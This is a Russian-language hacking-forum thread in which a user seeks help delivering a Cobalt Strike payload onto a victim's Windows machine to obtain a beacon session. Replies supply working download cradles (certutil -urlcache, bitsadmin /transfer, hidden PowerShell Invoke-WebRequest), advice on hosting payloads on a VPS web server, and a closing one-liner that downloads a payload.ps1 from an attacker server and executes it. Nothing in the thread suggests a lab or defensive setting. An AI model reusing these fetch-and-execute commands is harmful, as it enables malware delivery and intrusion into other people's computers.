Заливка payload в windows через powershell

[Limbo001]

Приветствую всех!

При заливке payload(сгенерировано в cobalt strike) в POWERSHELL через различные файлообменники certutil( скорее всего) ругается на валидность сертификата.

Использую команду
powershell -command "& { iwr link -OutFile example.txt } .

Также пробовал через SSH и NFS, безуспешно.
Основная цель-перевести сессию в кобу. Подскажите пожалуйста варианты решения проблемы.

 

[Adamantis]

start-bitstransfer прямая-ссылка-на-файл путь-куда-сохранить

 

[Limbo001]

start-bitstransfer прямая-ссылка-на-файл путь-куда-сохранить

Спасибо за помощь. К сожалению

+ CategoryInfo : InvalidOperation: ) [Start-BitsTransfer], Exception
+ FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
ndIntelligentTransfer.Management.NewBitsTransferCommand


powershell -command start-bitstransfer так тоже пробовал, не получилось. Рано или поздно все равно залью. Первые шаги и знакомство с PowerShell - посоветуй пж проверенные временем ресурсы по данной тематике, с привязкой к пентесту

 

[Knodb]

Приветствую всех!

При заливке payload(сгенерировано в cobalt strike) в POWERSHELL через различные файлообменники certutil( скорее всего) ругается на валидность сертификата.

Использую команду
powershell -command "& { iwr link -OutFile example.txt } .

Также пробовал через SSH и NFS, безуспешно.
Основная цель-перевести сессию в кобу. Подскажите пожалуйста варианты решения проблемы.

Привет. Покажи полный первоначальной ошибки.
Может это помочь, укажи перед загрузкой через powershell.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
powershell -command "& { iwr link -OutFile example.txt } .

 

[Limbo001]

Привет. Покажи полный первоначальной ошибки.
Может это помочь, укажи перед загрузкой через powershell.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
powershell -command "& { iwr link -OutFile example.txt } .

iwr : ‡ Їа®б Ўл« ЇаҐаў : ЌҐ г¤ «®бм ᮧ¤ вм § йЁйҐл© Є « SSL/TLS.
бва®Є :1 § Є:5
+ & { iwr https://anonfiles.com/../example_txt -OutFile example.txt }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Net.HttpWebRequest:Htt
pWebRequest) [Invoke-WebRequest], WebException
+ FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShe
ll.Commands.InvokeWebRequestCommand

Пробовал различные файлообменники и везде такая ошибка. Может быть есть магическая ссылка?)) Или вообще более точечный способ)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]:ls12 - данная команда не помогла

Версия PS: 5.1.14393.5127

Работаю с kali linux. Есть ли способ без кобы или аналогичных фреймворков загрузить содержимое windows?

 

[kamzzzzz]

Первые шаги и знакомство с PowerShell - посоветуй пж проверенные временем ресурсы по данной тематике, с привязкой к пентесту

Только сегодня человек выкладывал неплохую тему, рекомендую к прочтению, точно будет полезно

https://xss.pro/threads/73279/

 

[Satie]

Ты не пытался тянуть пэйлоад напрямую через впску и http?

 

[Adamantis]

Спасибо за помощь. К сожалению

+ CategoryInfo : InvalidOperation: ) [Start-BitsTransfer], Exception
+ FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
ndIntelligentTransfer.Management.NewBitsTransferCommand


powershell -command start-bitstransfer так тоже пробовал, не получилось. Рано или поздно все равно залью. Первые шаги и знакомство с PowerShell - посоветуй пж проверенные временем ресурсы по данной тематике, с привязкой к пентесту

Лайки для спасибо)

cmd.exe /c  bitsadmin.exe /transfer "JobName" http://download.anydesk.com/AnyDesk.exe C:\temp\

powershell -WindowStyle hidden Invoke-WebRequest -URI http://download.anydesk.com/AnyDesk.exe -outfile  C:\temp\

Import-Module BitsTransfer
и потом
start-bitstransfer

 

[Limbo001]

Cпасибо за инфу!!!

Только сегодня человек выкладывал неплохую тему, рекомендую к прочтению, точно будет полезно

https://xss.pro/threads/73279/[/URL

http://

 

[Limbo001]

Лайки для спасибо)

cmd.exe /c  bitsadmin.exe /transfer "JobName" http://download.anydesk.com/AnyDesk.exe C:\temp\

powershell -WindowStyle hidden Invoke-WebRequest -URI http://download.anydesk.com/AnyDesk.exe -outfile  C:\temp\

Import-Module BitsTransfer
и потом
start-bitstransfer

ЛайкнуЛЛ)))

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to add file - 0x80070005
ЋвЄ § ® ў ¤®бвгЇҐ.
(Устарел)

Invoke-WebRequest : ‡ Їа®б Ўл« ЇаҐаў : ЌҐ г¤ «®бм ᮧ¤ вм § йЁйҐл© Є « SSL ( на сертификат ругается, опять через anonfiles пробовал, жалко anydesk платный)

Import-Module BitsTransfer(импортировал) и start-bitstransfer -InvalidOperation: ) [Start-BitsTransfer], Exception -
StartBitsTransferCOMException,Microsoft.BackgroundIntelligentTransfer.Management.NewBitsTransferCommand

Есть ли бесп. файлообменики, на которых не будет ошибки аналогичной? Обычную картинку через https загружал

 

[wav]

берёш любой дедик ставишь на него AppServ ну или, что тебе по душе, делаешь или-или и всё заливается.
certutil -urlcache -split -f http://ip/AnyDesk.exe AnyDesk.exe
bitsadmin /transfer mydownloadjob /download /priority normal http://ip/AnyDesk.exe c:\\AnyDesk.exe

 

[Limbo001]

Ты не пытался тянуть пэйлоад напрямую через впску и http?

powershell -command "& { iwr ip/root/zx.txt -OutFile example.txt }" пытался, ошибку выдает

пробовал и через sftp

Cпс за помощь

 

[Limbo001]

Cпасибо за совет. Попробую

берёш любой дедик ставишь на него AppServ ну или, что тебе по душе, делаешь или-или и всё заливается.
certutil -urlcache -split -f http://ip/AnyDesk.exe AnyDesk.exe
bitsadmin /transfer mydownloadjob /download /priority normal http://ip/AnyDesk.exe c:\\AnyDesk.exe

 

[WildMilk]

powershell -command "& { iwr ip/root/zx.txt -OutFile example.txt }" пытался, ошибку выдает

пробовал и через sftp

Cпс за помощь

а ты вебсервер какой то поднимаешь на своей впске? апач хотяб.

 

[Limbo001]

а ты вебсервер какой то поднимаешь на своей впске? апач хотяб.

Да, конечно, а как иначе) Openserver обычно)

 

[Limbo001]

берёш любой дедик ставишь на него AppServ ну или, что тебе по душе, делаешь или-или и всё заливается.
certutil -urlcache -split -f http://ip/AnyDesk.exe AnyDesk.exe
bitsadmin /transfer mydownloadjob /download /priority normal http://ip/AnyDesk.exe c:\\AnyDesk.exe

Залил чуточку по другому. Просто развернул на vps apache, создал папку, закинул через зиллу пейлоады, и powershell -command "& { iwr http://ip/pay.exe -OutFile pay.exe }" . Спасибо за наводку бро!!!!

Теперь в другом проблема) При открыти payloada сессия в кобу не переходит и вылетаю с тачки жертвы(( Пробовал txt,ps1,exe .

 

[DanteXDark]

powershell.exe Invoke-WebRequest -Uri ' https://yourserv.com/payload.ps1 ' -OutFile $env : temp\payload.ps1; Start-Process $env : temp\payload.ps1

download and execute your ps1 file